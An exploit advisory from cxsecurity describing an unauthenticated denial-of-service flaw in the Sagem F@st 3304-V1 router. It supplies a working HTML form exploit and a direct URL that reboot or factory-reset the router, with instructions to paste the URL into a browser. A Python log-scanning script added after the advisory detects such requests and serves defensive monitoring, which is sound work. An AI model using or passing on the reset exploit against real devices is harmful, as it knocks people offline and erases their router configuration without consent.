Sagem F@st 3304-V1 denial of service Vulnerability

2014.07.28
Credit: Z3ro0ne
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title : Sagem F@st 3304-V1 denial of service Vulnerability
# Vendor Homepage : http://www.sagemcom.com
# Tested on : Firefox, Google Chrome
# Tested Router : Sagem F@st 3304-V1
# Date : 2014-07-26
# Author : Z3ro0ne
# Contact : saadousfar59@gmail.com
# Facebook Page : https://www.facebook.com/Z3ro0ne
# Vulnerability description : The vulnerability allows unauthenticated users to remotely restart and reset the router
# Exploit:

<html>
<title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title>
<body>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER">
</FORM>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="FACTORY RESET">
</FORM>
</body>
</html>

Reset to factory configuration :
---
Using Google Chrome browser :
To reset the router without any authentication, just enter the following URL in the URL bar:
http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale
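A detection-side view of the request described above, as an added example that is not part of the original advisory: it scans proxy log lines for hits on the advisory's /SubmitMaintCONFIG endpoint and labels each by where the request came from. The combined-log proxy format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client, request URL and Referer of a combined-format proxy log entry (assumed format).
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3} \S+ "([^"]*)"')
MAINT_PATH = "/SubmitMaintCONFIG"  # endpoint named in the advisory

def find_maint_requests(lines):
    """Return one finding per request to the router's maintenance endpoint."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, url, referer = m.groups()
        target = urlsplit(url)
        if target.path != MAINT_PATH:
            continue
        # The advisory's %E9 is Latin-1 "e acute"; the UTF-8 default would garble it.
        action = parse_qs(target.query, encoding="latin-1").get("ACTION", [""])[0]
        ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
        if ref_host is None:
            origin = "no-referer"   # typed URL, script, or stripped header
        elif ref_host == target.hostname:
            origin = "same-site"    # navigation from the router's own pages
        else:
            origin = "cross-site"   # triggered by a page hosted elsewhere
        findings.append({"client": client, "action": action, "origin": origin})
    return findings

# Constructed sample input (not captured traffic).
_URL = "http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale"
_TS = "[26/Jul/2014:10:02:11 +0000]"
SAMPLE_LOG = [
    f'192.168.1.23 - - {_TS} "GET {_URL} HTTP/1.1" 200 512 "http://forum.example/thread/42" "Mozilla/5.0"',
    f'192.168.1.10 - - {_TS} "GET {_URL} HTTP/1.1" 200 512 "http://192.168.1.1/" "Mozilla/5.0"',
    f'192.168.1.23 - - {_TS} "GET {_URL} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'192.168.1.10 - - {_TS} "GET http://192.168.1.1/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_maint_requests(SAMPLE_LOG):
        print(finding)
```

Because the endpoint acts on a plain GET without authentication, a "cross-site" or "no-referer" hit deserves the closest look; "same-site" hits are what an administrator using the router's own interface would produce.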



Copyright 2024, cxsecurity.com

 
